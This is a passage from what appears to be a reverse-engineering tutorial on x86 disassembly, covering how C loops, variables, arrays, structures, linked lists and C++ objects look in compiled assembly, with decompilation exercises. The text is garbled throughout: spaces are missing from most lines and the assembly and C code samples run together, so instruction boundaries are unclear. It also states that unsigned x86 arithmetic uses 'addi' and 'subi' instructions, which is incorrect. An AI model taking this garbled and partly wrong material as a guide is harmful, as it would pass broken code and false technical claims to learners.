genericwhile-loop:
while(x){//loopbody}
What does this loop do? First, the loop checks to make
surethatxistrue. Ifxisnottrue,theloopisskipped. The
loopbodyisthenexecuted,followedbyanothercheck: is
xstilltrue? Ifxisstilltrue,executionjumpsbacktothe
top of the loop, and execution continues. Keep in mind
that there needs to be a jump at the bottom of the loop
(togetbackuptothetop),butitmakesnosensetojump
backtothetop,retesttheconditional,andthenjump back
to the bottom of the loop iftheconditionalisfoundtobe
false. Thewhile-loopthen,performsthefollowingsteps:
1.checkthecondition. ifitisfalse,gototheend
2.performtheloopbody
3.checkthecondition,ifitistrue,jumpto2.
4.if the condition is not true, fall-through the end of
theloop.
Hereisawhile-loopinCcode:
while(x<=10){x++;}Andherethenisthatsamelooptranslatedintoassembly:
mov eax, $x cmp eax, 0x0A jg end beginning: inc eax
cmpeax,0x0Ajlebeginningend:
If we were to translate that assembly code backintoC ,
wewouldgetthefollowingcode:
if(x <= 10) //remember: in If statements, we reverse
theconditionfromtheasm{do{x++;}while(x<=10)}
SeewhywecoveredtheDo-Whileloopfirst? Becausethe
While-loopbecomesaDo-Whilewhenitgetsassembled.
Sowhycan'tthejumplabeloccurbeforethetest?
mov eax, $x beginning: cmp eax, 0x0A jg end inc eax
jmpbeginningend: mov$x,eax
3.8.4 ForLoops
WhatisaFor-Loop? Inessence,it’saWhile-Loopwith
an initial state, a condition, and an iterative instruction.
Forinstance,thefollowinggenericFor-Loop:
getstranslatedintothefollowingpseudocodewhile-loop:
initialization;while(condition){action;increment;}
WhichinturngetstranslatedintothefollowingDo-While
Loop:
initialization; if(condition) { do { action; increment; }
while(condition);}
Notethatofteninfor()loopsyouassignaninitialconstant
value in A (for example x = 0), and then compare that
value with another constant in B (for example x < 10).
Mostoptimizingcompilerswillbeabletonoticethatthe
firsttimexISlessthan10,andthereforethereisnoneed
fortheinitialif(B)statement. Insuchcases,thecompiler
willsimplygeneratethefollowingsequence:
initialization;do{actionincrement;}while(condition);
renderingthecodeindistinguishablefromawhile()loop.
3.8.5 OtherLoopTypes
C only has Do-While, While, and For Loops, but some
otherlanguagesmayverywellimplementtheirowntypes.
Also,agoodC-Programmercouldeasily“homebrew”a
new type of loop using a series of good macros, so they
bearsomeconsideration:
Do-UntilLoop
AcommonDo-UntilLoopwilltakethefollowingform:
3.9. LOOP EXAMPLES 51
do{//loopbody}until(x);
whichessentiallybecomesthefollowingDo-Whileloop:
do{//loopbody}while(!x);
UntilLoop
Like the Do-Until loop, the standard Until-Loop looks
likethefollowing:
until(x){//loopbody}
which (likewise) gets translated to the following While-
Loop:
while(!x){//loopbody}
Do-ForeverLoop
A Do-Forever loop is simply an unqualified loop with a
conditionthatisalwaystrue. Forinstance,thefollowing
pseudo-code:
doforever{//loopbody}
willbecomethefollowingwhile-loop:
while(1){//loopbody}
Whichcanactuallybereducedtoasimpleunconditional
jumpstatement:
beginning: ;loopbodyjmpbeginning
Noticethatsomenon-optimizingcompilerswillproduce
nonsensicalcodeforthis:
mov ax, 1 cmp ax, 1 jne loopend beginning: ;loop body
cmpax,1jebeginningloopend:
Noticethatalotofthecomparisonsherearenotneeded
sincetheconditionisaconstant. Mostcompilerswillop-
timizecaseslikethis.
3.9 LoopExamples
3.9.1 Example:IdentifyPurpose
What does this function do? What kinds of parameters
does it take, and what kind of results (if any) does it re-
turn?push ebp mov ebp, esp mov esi, [ebp + 8] mov ebx, 0
moveax,0movecx,0_Label_1: movecx,[esi+ebx*
4]addeax,ecxincebxcmpebx,100jne_Label_1mov
esp,ebppopebpret4
Thisfunctionloopsthroughanarrayof4byteintegerval-
ues,pointedtobyesi,andaddseachentry. Itreturnsthe
sumineax. Theonlyparameter(locatedin[ebp+8])is
a pointer to an array of integer values. The comparison
between ebx and 100 indicates that the input array has
100entriesinit. Thepointeroffset[esi+ebx*4]shows
thateachentryinthearrayis4byteswide.
3.9.2 Example:CompleteCPrototype
Whatisthisfunction’sCprototype? Makesuretoinclude
parameters,returnvalues,andcallingconvention.
push ebp mov ebp, esp mov esi, [ebp + 8] mov ebx, 0
moveax,0movecx,0_Label_1: movecx,[esi+ebx*
4]addeax,ecxincebxcmpebx,100jne_Label_1mov
esp,ebppopebpret4
Notice how the retfunction cleans its parameter off the
stack? That means that this function is an STDCALL
function. We know that the function takes, as its only
parameter, a pointer to an array of integers. We do not
know, however, whether the integers are signed or un-
signed,becausethe jecommandisusedforbothtypesof
values. Wecanassumeoneortheother,andforsimplic-
ity,wecanassumeunsignedvalues(unsignedandsigned
values,inthisfunction,willactuallyworkthesameway).
We also know that the return value is a 4-byte integer
value, of the same type as is found in the parameter ar-
ray. Since the function doesnt have a name, we can just
callit“MyFunction”,andwecancalltheparameter“ar-
ray”becauseitisanarray. Fromthisinformation,wecan
determinethefollowingprototypeinC:
unsigned int STDCALL MyFunction(unsigned int
*array);
3.9.3 Example:DecompileToCCode
DecompilethiscodeintoequivalentCsourcecode.
push ebp mov ebp, esp mov esi, [ebp + 8] mov ebx, 0
moveax,0movecx,0_Label_1: movecx,[esi+ebx*
4]addeax,ecxincebxcmpebx,100jne_Label_1mov
esp,ebppopebpret4
Starting with the function prototype above, and the de-
scriptionofwhatthisfunctiondoes,wecanstarttowrite
theCcodeforthisfunction. Weknowthatthisfunction
initializes eax, ebx, and ecx before the loop. However,
wecanseethatecxisbeingusedassimplyanintermedi-
52 CHAPTER 3. CODE PATTERNS
atestoragelocation,receivingsuccessivevaluesfromthe
array,andthenbeingaddedtoeax.
We will create two unsigned integer values, a (for eax)
and b (for ebx). We will define both a and b with the
registerqualifier, so that we can instruct the compiler
nottocreatespaceforthemonthestack. Foreachloop
iteration,weareaddingthevalueofthearray,atlocation
ebx*4to therunningsum, eax. Convertingthistooura
andbvariables,andusingCsyntax,wesee:
a=a+array[b];
Theloopcouldbeeithera forloop,orawhileloop. We
seethattheloopcontrolvariable,b,isinitializedto0be-
foretheloop,andisincrementedby1eachloopiteration.
Thelooptestsbagainst100, after it gets incremented ,so
we know that b never equals 100 inside the loop body.
Usingthesesimplefacts,wewillwritetheloopin3dif-
ferentways:
First,withawhileloop.
unsigned int STDCALL MyFunction(unsigned int
*array){registerunsignedintb=0;registerunsignedint
a=0;while(b!=100){a=a+array[b];b++;}returna;}
Or,withaforloop:
unsigned int STDCALL MyFunction(unsigned int
*array){registerunsignedintb;registerunsignedinta=
0;for(b=0;b!=100;b++){a=a+array[b];}returna;}
Andfinally,witha do-whileloop:
unsigned int STDCALL MyFunction(unsigned int *ar-
ray){registerunsignedintb=0;registerunsignedinta=
0;do{a=a+array[b];b++;}while(b!=100);returna;}
Chapter4
DataPatterns
4.1 Variables
4.1.1 Variables
We'vealreadyseensomemechanismstocreatelocalstor-
ageonthestack. Thischapterwilltalkaboutsomeother
variables, including global variables ,static variables ,
variableslabled" const,”"register,”and"volatile.”Itwill
also consider some general techniques concerning vari-
ables, including accessor and setter methods (to borrow
fromOOterminology). Thissectionmayalsotalkabout
settingmemorybreakpointsinadebuggertotrackmem-
oryI/Oonavariable.
4.1.2 HowtoSpotaVariable
Variablescomein2distinctflavors: thosethatarecreated
onthestack(localvariables),andthosethatareaccessed
viaahardcodedmemoryaddress(globalvariables). Any
memorythatisaccessedviaahard-codedaddressisusu-
ally a global variable. Variables that are accessed as an
offsetfromesp,orebparefrequentlylocalvariables.
Hardcodedaddress Anything hardcoded is a value
thatisstoredas-isinthebinary,andisnotchanged
atruntime. Forinstance,thevalue0x2054ishard-
coded,whereasthecurrentvalueofvariableXisnot
hard-codedandmaychangeatruntime.
Exampleofahardcodedaddress:
moveax,[0x77651010]
OR:
movecx,0x77651010moveax,[ecx]
Exampleofanon-hardcoded(softcoded?) address:
movecx,[esp+4]addecx,ebxmoveax,[ecx]Inthelastexample,thevalueofecxiscalculatedatrun-
time,whereasinthefirst2examples,thevalueisthesame
everytime. RVAsareconsideredhard-codedaddresses,
eventhoughtheloaderneedsto“fixthemup”topointto
thecorrectlocations.
4.1.3 .BSSand.DATAsections
Both .bss and .data sections contain values which can
change at run-time (e.g. variables). Typically, variables
thatareinitializedtoanon-zerovalueinthesourceareal-
locatedinthe.datasection(e.g. “inta=10;"). Variables
that are not initialized, or initialized with a zero value,
canbeallocatedtothe.bsssection(e.g. “intarr[100];").
Becauseallvaluesof.bssvariablesareguaranteedtobe
zeroatthestartoftheprogram, thereisnoneedforthe
linkertoallocatespaceinthebinaryfile. Therefore,.bss
sectionsdonottakespaceinthebinaryfile,regardlessof
theirsize.
4.1.4 “Static”LocalVariables
Localvariableslabeled staticmaintaintheirvalueacross
function calls, and therefore cannot be created on the
stack like other local variables are. How are static vari-
ablescreated? Let’stakeasimpleexampleCfunction:
void MyFunction(int a) { static int x = 0; printf(“my
number: ");printf("%d,%d\n”,a,x);}
Compilingtoalistingfilewith cl.exegivesusthefollow-
ingcode:
_BSS SEGMENT ?x@?1??MyFunction@@9@9 DD
01H DUP (?) ; `MyFunction'::`2'::x _BSS ENDS
_DATA SEGMENT $SG796 DB 'my number: ', 00H
$SG797 DB '%d, %d', 0aH, 00H _DATA ENDS PUB-
LIC _MyFunction EXTRN _printf:NEAR ; Function
compile flags: /Odt _TEXT SEGMENT _a$ = 8 ; size
= 4 _MyFunction PROC NEAR ; Line 4 push ebp
mov ebp, esp ; Line 6 push OFFSET FLAT:$SG796
call _printf add esp, 4 ; Line 7 mov eax, DWORD
PTR ?x@?1??MyFunction@@9@9 push eax mov
ecx, DWORD PTR _a$[ebp] push ecx push OFFSET
53
54 CHAPTER 4. DATA PATTERNS
FLAT:$SG797 call _printf add esp, 12 ; 0000000cH ;
Line8popebpret0_MyFunctionENDP_TEXTENDS
Normallywhenassemblylistingsarepostedinthiswiki-
book,mostofthecodegibberishisdiscardedtoaidread-
ability, but in this instance, the “gibberish” contains the
answer we are looking for. As can be clearly seen, this
functioncreatesastandardstackframe,anditdoesn'tcre-
ate any local variables on the stack. In the interests of
being complete, we will take baby-steps here, and work
totheconclusionlogically.
InthecodeforLine7,thereisacallto_printfwith3ar-
guments. Printfisastandard libcfunction,anditthere-
forecanbeassumedtobecdeclcallingconvention. Ar-
guments are pushed, therefore, from right to left. Three
arguments are pushed onto the stack before _printf is
called:
DWORDPTR?x@?1??MyFunction@@9@9
DWORDPTR_a$[ebp]
OFFSETFLAT:$SG797
The second one, _a$[ebp] is partially defined in this as-
semblyinstruction:
_a$=8
And therefore _a$[ebp] is the variable located at offset
+8fromebp,orthefirstargumenttothefunction. OFF-
SETFLAT:$SG797likewiseisdeclaredintheassembly
listingassuch:
SG797DB'%d,%d',0aH,00H
If you have your ASCII table handy, you will notice
that 0aH = 0x0A = '\n'. OFFSET FLAT:$SG797
then is the format string to our printf statement.
Our last option then is the mysterious-looking
"?x@?1??MyFunction@@9@9”, which is defined
inthefollowingassemblycodesection:
_BSS SEGMENT ?x@?1??MyFunction@@9@9 DD
01HDUP(?) _BSSENDS
This shows that the Microsoft C compiler creates static
variablesinthe.bsssection. Thismightnotbethesame
for all compilers, but the lesson is the same: local static
variables are created and used in a very similar, if not
the exact same, manner as global values. In fact, as far
as the reverser is concerned, the two are usually inter-
changeable. Remember,theonlyrealdifferencebetween
staticvariablesandglobalvariablesistheideaof“scope”,
whichisonlyusedbythecompiler.4.1.5 SignedandUnsignedVariables
Integerformattedvariables,suchas int,char,shortand
longmaybedeclaredsignedorunsignedvariablesinthe
C source code. There are two differences in how these
variablesaretreated:
1.Signedvariablesusesignedinstructionssuchas add,
andsub. Unsigned variables use unsigned arith-
meticinstructionssuchas addi,andsubi.
2.Signedvariablesusesignedbranchinstructionssuch
asjgeandjl. Unsigned variables use unsigned
branchinstructionssuchas jae,andjb.
Thedifferencebetweensignedandunsignedinstructions
istheconditionsunderwhichthevariousflagsforgreater-
thanorless-than(overflowflags)areset. Theintegerre-
sult values are exactly the same for both signed and un-
signeddata.
4.1.6 Floating-PointValues
Floating point values tend to be 32-bit data values (for
float) or 64-bit data values (for double). These values
are distinguished from ordinary integer-valued variables
because they are used with floating-point instructions.
Floating point instructions typically start with the letter
f. Forinstance, fadd,fcmp,andsimilarinstructionsare
used with floating point values. Of particular note are
thefloadinstructionandvariants. Theseinstructionstake
an integer-valued variable and converts it into a floating
pointvariable.
Wewilldiscussfloatingpointvariablesinmoredetailin
alaterchapter.
4.1.7 GlobalVariables
Global variables do not have a limited scope like lexi-
calvariablesdoinsideafunctionbody. Sincethenotion
oflexicalscopeimpliestheuseofthesystemstack,and
since global variables are not lexical in nature, they are
typically not found on the stack. Global variables tend
toexistintheprogramasahard-codedmemoryaddress,
a location which never changes throughout program ex-
ecution. These could exist in the DATA segment of the
executable, or anywhere else that a hard-coded memory
addresscanbeusedtostoredata.
InC,globalvariablesaredefinedoutsidethebodyofany
function. There is no “global” keyword. Any variable
whichisnotdefinedinsideafunctionisglobal. InChow-
ever, a variable which is not defined inside a function is
onlyglobaltotheparticularsourcecodefileinwhichitis
defined. Forexample,wehavetwofilesFoo.candBar.c,
andaglobalvariableMyGlobalVar:
4.1. VARIABLES 55
Intheexampleabove,thevariableMyGlobalVarisvisible
insidethefileFoo.c,butisnotvisibleinsidethefileBar.c.
TomakeMyGlobalVarvisibleinsideallprojectfiles,we
need to use the extern keyword, which we will discuss
below.
“static”Variables
TheCprogramminglanguagespecifiesaspecialkeyword
“static” to define variables which are lexical to the func-
tion (they cannot be referenced from outside the func-
tion)buttheymaintaintheirvaluesacrossfunctioncalls.
Unlikeordinarylexicalvariableswhicharecreatedonthe
stackwhenthefunctionisenteredandaredestroyedfrom
the stack when the function returns, static variables are
createdonceandareneverdestroyed.
intMyFunction(void){staticintx;... }
StaticvariablesinCareglobalvariables,exceptthecom-
piler takes precautions to prevent the variable from be-
ingaccessedoutsideoftheparentfunction’sscope. Like
global variables, static variables are referenced using a
hardcoded memory address, not a location on the stack
like ordinary variables. However unlike globals, static
variables are only used inside a single function. There
is no difference between a global variable which is only
usedinasinglefunction,andastaticvariableinsidethat
samefunction. However,it’sgoodprogrammingpractice
to limit the number of global variables, so when disas-
sembling, you should prefer interpreting these variables
asstaticinsteadofglobal.
“extern”Variables
The extern keyword is used by a C compiler to indicate
thataparticularvariableisglobaltotheentireproject,not
justtoasinglesourcecodefile. Besidesthisdistinction,
and the slightly larger lexical scope of extern variables,
theyshouldbetreatedlikeordinaryglobalvariables.
Instaticlibraries,variablesmarkedasbeingexternmight
beavailableforusewithprogramswhicharelinkedtothe
library.
GlobalVariablesSummary
Here is a table to summarize some points about global
variables:
When disassembling, a hard-coded memory address
should be considered to be an ordinary global variable
unlessyoucandeterminefromthescopeofthevariable
thatitisstaticorextern.4.1.8 Constants
Variablesqualifiedwiththe constkeyword(inC)arefre-
quentlystoredinthe.datasectionoftheexecutable. Con-
stant values can be distinguished because they are ini-
tialized at the beginning of the program, and are never
modified by the program itself. For this reasons, some
compilers may chose to store constant variables (espe-
cially strings) in the .text section of the executable, thus
allowingthesharingofthesevariablesacrossmultiplein-
stances of the same process. This creates a big problem
forthereverser,whonowhastodecidewhetherthecode
he’s looking at is part of a constant variable or part of a
subroutine.
4.1.9 “Volatile”memory
InCandC++,variablescanbedeclared“volatile,”which
tells the compiler that the memory location can be ac-
cessed from externalorconcurrent processes, and that
thecompilershouldnotperformanyoptimizationsonthe
variable. Forinstance,ifmultiplethreadswereallaccess-
ingandmodifyingasingleglobalvalue, itwouldbebad
forthecompilertostorethatvariableinaregistersome-
times, and flush it to memory infrequently. In general,
Volatilememorymustbeflushedtomemoryafterevery
calculation,toensurethatthemostcurrentversionofthe
dataisinmemorywhenotherprocessescometolookfor
it.
It is not always possible to determine from a disassem-
bly listing whether a given variable is a volatile vari-
able. However,ifthevariableisaccessedfrequentlyfrom
memory, and its value is constantly updated in memory
(especially if there are free registers available), that’s a
goodhintthatthevariablemightbevolatile.
4.1.10 SimpleAccessorMethods
An Accessor Method is a tool derived from OO the-
ory and practice. In it’s most simple form, an accessor
methodisafunctionthatreceivesnoparameters(orper-
hapssimplyanoffset),andreturnsthevalueofavariable.
AccessorandSettermethodsarewaystorestrictaccessto
certainvariables. Theonlystandardwaytogetthevalue
ofthevariableistousetheAccessor.
Accessors can prevent some simple problems, such as
out-of-bounds array indexing, and using uninitialized
data. Frequently, Accessors contain little or no error-
checking.
Hereisanexample:
push ebp mov ebp, esp moveax, [ecx + 8] ;THISCALL
function, passes “this” pointer in ecx mov esp, ebp pop
ebpret
56 CHAPTER 4. DATA PATTERNS
Because they are so simple, accessor methods are fre-
quently heavily optimized (they generally don't need a
stack frame), and are even occasionally inlinedby the
compiler.
4.1.11 SimpleSetter(Manipulator)Meth-
ods
Settermethodsaretheantithesisofanaccessormethod,
andprovideaunifiedwayofalteringthevalueofagiven
variable. Setter methods will often take as a parameter
the value to be set to the variable, although some meth-
ods (Initializers) simply set the variable to a pre-defined
value. Settermethodsoftendoboundschecking,ander-
rorcheckingonthevariablebeforeitisset,andfrequently
either a) return no value, or b) return a simple boolean
valuetodeterminesuccess.
Hereisanexample:
push ebp mov ebp, esp cmp [ebp + 8], 0 je error mov
eax, [ebp + 8] mov [ecx + 0], eax mov eax, 1 jmp end
:errormoveax,0:endmovesp,ebppopebpret
4.2 VariableExamples
4.2.1 Example:IdentifyC++Code
CanyoutellwhattheoriginalC++sourcecodelookslike,
ingeneral,forthefollowingaccessormethod?
pushebp mov ebp, esp mov eax, [ecx+ 8] ;THISCALL
function, passes “this” pointer in ecx mov esp, ebp pop
ebpret
We don't know the name of the class, so we will use a
genericnameMyClass(orwhateveryouwouldliketocall
it). Wewilllayoutasimpleclassdefinition,thatcontains
adatavalueatoffset+8. Offset+8istheonlydatavalue
accessed,sowedon'tknowwhatthefirst8bytesofdata
lookslike,butwewilljustassume(forourpurposes)that
ourclasslookslikethis:
classMyClass{intvalue1;intvalue2;intvalue3;//offset
+8... }
Wewillthencreateourfunction, whichIwillcall“Get-
Value3()". We know that the data value being accessed
is located at [ecx+8], (which we have defined above to
be “value3”). Also, we know that the data is being read
intoa4-byteregister(eax),andisnottruncated. Wecan
assume,therefore,thatvalue3isa4-bytedatavalue. We
canusethethispointerasthepointervaluestoredinecx,andwecantaketheelementthatisatoffset+8fromthat
pointer(value3):
MyClass::GetValue3(){returnthis->value3;}
Thethispointerisnotnecessaryhere,butiuseitanyway
to illustrate the fact that the variable was accessed as an
offsetfromthe thispointer.
Note: Remember, we don't know what the first 8 bytes
actually look like in our class, we only have a single ac-
cessor method, that only accesses a single data value at
offset+8. Theclasscouldalsohavelookedlikethis:
class MyClass /*Alternate Definition*/ { byte byte1;
bytebyte2;shortshort1;longvalue2;longvalue3;... }
Or,anyothercombinationsof8bytes.
4.2.2 Example:IdentifyC++Code
CanyoutellwhattheoriginalC++sourcecodelookslike,
ingeneral,forthefollowingsettermethod?
push ebp mov ebp, esp cmp [ebp + 8], 0 je error mov
eax, [ebp + 8] mov [ecx + 0], eax mov eax, 1 jmp end
:errormoveax,0:endmovesp,ebppopebpret
Thiscodelooksalittlecomplicated,butdon'tpanic! We
willwalkthroughitslowly. Thefirsttwolinesofcodeset
upthestackframe:
pushebpmovebp,esp
The next two lines of code compare the value of [ebp +
8](whichweknowtobethefirstparameter)to zero. If
[ebp+8] is zero, the function jumps to the label “error”.
Weseethatthelabel“error”setseaxto0,andreturns. We
haven'tseenitbefore,butthislooksconspicuouslylikean
ifstatement. “Iftheparameteriszero,returnzero”.
If,ontheotherhand,theparameterisnotzero,wemove
the value into eax, and then move the value into [ecx +
0],whichweknowasthefirstdatafieldinMyClass. We
alsosee, fromthiscode, thatthisfirstdatafieldmustbe
4byteslong(becauseweareusingeax). Afterwemove
eaxinto[ecx+0],weseteaxto1andjumptotheendof
thefunction.
If we use the same MyClass defintion as in question 1,
above, we can get the following code for our function,
“SetValue1(intval)":
int MyClass::SetValue1(int val) { if(val == 0) return 0;
this->value1=val;return1;}
Notice that since we are returning a 0 on failure, and a
1 onsuccess, thefunctionlooks likeit hasa boolreturn
value. However, the return value is 4 bytes wide (eax is
used), but the size of a boolis implementation-specific,
4.3. DATA STRUCTURES 57
so we can't be sure. The boolis usually defined to have
asizeof1byte,butitisoftenstoredthesamewayasan
int.
4.3 DataStructures
4.3.1 DataStructures
Few programs can work by using simple memory stor-
age; most need to utilize complex data objects, includ-
ingpointers,arrays,structures ,andothercomplicated
types. This chapter will talk about how compilers im-
plement complex data objects, and how the reverser can
identifytheseobjects.
4.3.2 Arrays
Arraysaresimplyastorageschemeformultipledataob-
jects of the same type. Data objects are stored sequen-
tially, often as an offset from a pointer to the beginning
ofthearray. ConsiderthefollowingCcode:
x=array[25];
Whichisidenticaltothefollowingasmcode:
movebx,$arraymoveax,[ebx+25]mov$x,eax
Now,considerthefollowingexample:
intMyFunction1(){intarray[20];...
This (roughly) translates into the following asm pseudo-
code:
:_MyFunction1 push ebp mov ebp, esp sub esp, 80 ;the
whole array is created on the stack!!! lea $array, [esp
+0];apointertothearrayissavedinthearrayvariable...
Theentirearrayiscreatedonthestack,andthepointerto
the bottom of the array is stored in the variable “array”.
Anoptimizingcompilercouldignorethelastinstruction,
andsimplyrefertothearrayviaa+0offsetfromesp(in
thisexample),butwewilldothingsverbosely.
Likewise,considerthefollowingexample:
voidMyFunction2(){charbuffer[4];...
Thiswilltranslateintothefollowingasmpseudo-code:
:_MyFunction2 push ebp mov ebp, esp sub esp, 4 lea
$buffer,[esp+0]...Which looks harmless enough. But, what if a program
inadvertantly accesses buffer[4]? what about buffer[5]?
what about buffer[8]? This is the makings of a buffer
overflowvulnerability,and(might)willbediscussedina
latersection. However,thissectionwon'ttalkaboutsecu-
rityissues,andinsteadwillfocusonlyondatastructures.
SpottinganArrayontheStack
To spot an array on the stack, look for large amounts of
localstorageallocatedonthestack(“subesp,1000”,for
example), and look for large portions of that data being
accessed by an offset from a different register from esp.
Forinstance:
:_MyFunction3 push ebp mov ebp, esp sub esp, 256 lea
ebx,[esp+0x00]mov[ebx+0],0x00
is a good sign of an array being created on the stack.
Granted,anoptimizingcompilermightjustwanttooffset
fromespinstead,soyouwillneedtobecareful.
SpottinganArrayinMemory
Arraysinmemory,suchasglobalarrays,orarrayswhich
haveinitialdata(remember,initializeddataiscreatedin
the.datasectioninmemory)andwillbeaccessedasoff-
setsfromahardcodedaddressinmemory:
:_MyFunction4 push ebp mov ebp, esp mov esi,
0x77651004 mov ebx, 0x00000000 mov [esi + ebx],
0x00
It needs to be kept in mind that structures and classes
might be accessed in a similar manner, so the reverser
needs to remember that all the data objects in an array
are of the same type, that they are sequential, and they
willoftenbehandledinaloopofsomesort. Also, (and
thismightbethemostimportantpart),eachelementsin
an array may be accessed by a variable offset from the
base.
Sincemosttimesanarrayisaccessedthroughacomputed
index,notthroughaconstant,thecompilerwilllikelyuse
thefollowingtoaccessanelementofthearray:
mov[ebx+eax],0x00
If the array holds elements larger than 1 byte (for char),
the index will need to be multiplied by the size of the
element,yieldingcodesimilartothefollowing:
mov [ebx + eax * 4], 0x11223344 # access to an array
ofDWORDs,e.g. arr[i]=0x11223344... muleax,$20
#accesstoanarrayofstructs,each20byteslongleaedi,
[ebx+eax]#e.g. ptr=&arr[i]
Thispatterncanbeusedtodistinguishbetweenaccesses
58 CHAPTER 4. DATA PATTERNS
toarraysandaccessestostructuredatamembers.
4.3.3 Structures
AllCprogrammersaregoingtobefamiliarwiththefol-
lowingsyntax:
struct MyStruct { int FirstVar; double SecondVar;
unsignedshortintThirdVar;}
It’scalledastructure(Pascalprogrammersmayknowa
similarconceptasa“record”).
Structures may be very big or very small, and they may
contain all sorts of different data. Structures may look
very similar to arrays in memory, but a few key points
need to be remembered: structures do not need to con-
tain data fields of all the same type, structure fields are
often 4-byte aligned (not sequential), and each element
in a structure has its own offset. It therefore makes no
sensetoreferenceastructureelementbyavariableoffset
fromthebase.
Takealookatthefollowingstructuredefinition:
struct MyStruct2 { long value1; short value2; long
value3;}
Assuming the pointer to the base of this structure is
loadedintoebx, wecanaccessthesemembersinoneof
twoschemes:
Thefirstarrangementisthemostcommon,butitclearly
leavesopenanentirememoryword(2bytes)atoffset+6,
whichisnotusedatall. Compilersoccasionallyallowthe
programmer to manually specify the offset of each data
member,butthisisn'talwaysthecase. Thesecondexam-
plealsohasthebenefitthatthereversercaneasilyidentify
thateachdatamemberinthestructureisadifferentsize.
Considernowthefollowingfunction:
:_MyFunctionpushebpmovebp,espleaecx,SS:[ebp+
8]mov[ecx+0],0x0000000Amov[ecx+4],ecxmov
[ecx+8],0x0000000Amovesp,ebppopebp
Thefunctionclearlytakesapointertoadatastructureas
its first argument. Also, each data member is the same
size (4 bytes), so how can we tell if this is an array or a
structure? Toanswerthatquestion,weneedtoremember
one important distinction between structures and arrays:
theelementsinanarrayareallofthesametype, theel-
ements in a structure do not need to be the same type.
Giventhatrule,itisclearthatoneoftheelementsinthis
structure is a pointer (it points to the base of the struc-
ture itself!) and the other two fields are loaded with the
hex value 0x0A (10 in decimal), which is certainly not
a valid pointer on any system I have ever used. We can
thenpartiallyrecreatethestructureandthefunctioncode
below:struct MyStruct3 { long value1; void *value2; long
value3; } void MyFunction2(struct MyStruct3 *ptr) {
ptr->value1=10;ptr->value2=ptr;ptr->value3=10;}
As a quick aside note, notice that this function doesn't
load anything into eax, and therefore it doesn't return a
value.
4.3.4 AdvancedStructures
Letssaywehavethefollowingsituationinafunction:
:MyFunction1pushebpmovebp,espmovesi,[ebp+8]
leaecx,SS:[esi+8]...
whatishappeninghere? First,esiisloadedwiththevalue
of the function’s first parameter (ebp + 8). Then, ecx is
loaded with a pointer to the offset +8 from esi. It looks
likewehave2pointersaccessingthesamedatastructure!
The function in question could easily be one of the fol-
lowing2prototypes:
struct MyStruct1 { DWORD value1; DWORD value2;
structMySubStruct1{...
struct MyStruct2 { DWORD value1; DWORD value2;
DWORDarray[LENGTH];...
onepointeroffsetfromanotherpointerinastructureof-
ten means a complex data structure. There are far too
manycombinationsofstructuresandarrays,however,so
thiswikibookwillnotspendtoomuchtimeonthissub-
ject.
4.3.5 IdentifyingStructsandArrays
Array elements and structure fields are both accessed as
offsetsfromthearray/structurepointer. Whendisassem-
bling, how do we tell these data structures apart? Here
aresomepointers:
1.arrayelementsarenotmeanttobeaccessedindivid-
ually. Arrayelementsaretypicallyaccessedusinga
variableoffset
2.Arrays are frequently accessed in a loop. Because
arrays typically hold a series of similar data items,
the best way to access them all is usually a loop.
Specifically, for(x = 0; x < length_of_array; x++)
styleloopsareoftenusedtoaccessarrays,although
therecanbeothers.
3.Alltheelementsinanarrayhavethesamedatatype.
4.Struct fields are typically accessed using constant
offsets.
5.Structfieldsaretypicallynotaccessedinorder,and
arealsonotaccessedusingloops.
4.4. OBJECTS AND CLASSES 59
6.Structfieldsarenottypicallyallthesamedatatype,
orthesamedatawidth
4.3.6 LinkedListsandBinaryTrees
Two common structures used when programming are
linkedlistsandbinarytrees. Thesetwostructuresinturn
can be made more complicated in a number of ways.
Shownintheimagesbelowareexamplesofalinkedlist
structureandabinarytreestructure.
Eachnodeinalinkedlistorabinarytreecontainssome
amountofdata,andapointer(orpointers)toothernodes.
Considerthefollowingasmcodeexample:
loop_top: cmp[ebp+0],10jeloop_endmovebp,[ebp
+4]jmploop_toploop_end:
At each loop iteration, a data value at [ebp + 0] is com-
paredwiththevalue10. Ifthetwoareequal,theloopis
ended. If the two are not equal, however, the pointer in
ebp is updated with a pointer at an offset from ebp, and
theloopiscontinued. Thisisaclassiclinked-loopsearch
technique. ThisisanalagoustothefollowingCcode:
struct node { int data; struct node *next; }; struct node
*x;... while(x->data!=10){x=x->next;}
Binary trees are the same, except two different pointers
willbeused(therightandleftbranchpointers).
4.4 ObjectsandClasses
The Objects and Classes page of the X86 Disassembly
Wikibook is a stub. You can help by expanding this sec-
tion.
4.4.1 Object-OrientedProgramming
Object-Oriented (OO) programming provides for us a
new unit of program structure to contend with: the Ob-
ject. Thischapterwilllookatdisassembledclassesfrom
C++. ThischapterwillnotdealdirectlywithCOM,but
itwillworktosetalotofthegroundworkforfuturedis-
cussionsinreversingCOMcomponents(Windowsusers
only).
4.4.2 Classes
Abasicclassthathasnotinheritedanythingcanbebro-
ken into two parts, the variables and the methods. The
non-static variables are shoved into a simple data struc-
turewhilethemethodsarecompiledandcalledlikeevery
otherfunction.Whenyoustartaddingininheritanceandpolymorphism,
things get a little more complicated. For the purposes
ofsimplicity,thestructureofanobjectwillbedescribed
in terms of having no inheritance. At the end, however,
inheritanceandpolymorphismwillbecovered.
Variables
All static variables defined in a class resides in the static
regionofmemoryfortheentiredurationoftheapplica-
tion. Every other variable defined in the class is placed
intoadatastructureknownasanobject. Typicallywhen
theconstructoriscalled,thevariablesareplacedintothe
objectinsequentialorder,see Figure1.
A:
classABC123{public: inta,b,c;ABC123():a(1),b(2),
c(3){};};
B:
0x00200000 dd 1 ;int a 0x00200004 dd 2 ;int b
0x00200008dd3;intc
However,thecompilertypicallyneedsthevariablestobe
separatedintosizesthataremultiplesofaword(2bytes)
inordertolocatethem. Notallvariablesfitthisrequire-
ment,namelychararrays;someunusedbitsmightbeused
padthevariablessotheymeetthissizerequirement. This
isillustratedin Figure2.
A:
class ABC123{ public: int a; char b[3]; double c;
ABC123():a(1),c(3){strcpy(b,"02”);};};
B:
0x00200000dd1;inta;offset=abc123+0*word_size
0x00200004 db '0' ;b[0] = '0' ; offset = abc123 +
2*word_size0x00200005db'2';b[1]='2'0x00200006
db 0 ;b[2] = null 0x00200007 db 0 ;<= UNUSED
BYTE0x00200008dd0x00000000;doublec,lower32
bits ; offset = abc123 + 4*word_size 0x0020000C dd
0x40080000;doublec,upper32bits
Inorderfortheapplicationtoaccessoneoftheseobject
variables, anobjectpointerneedstobeoffsettofindthe
desiredvariable. Theoffsetofeveryvariableisknownby
the compiler and written into the object code wherever
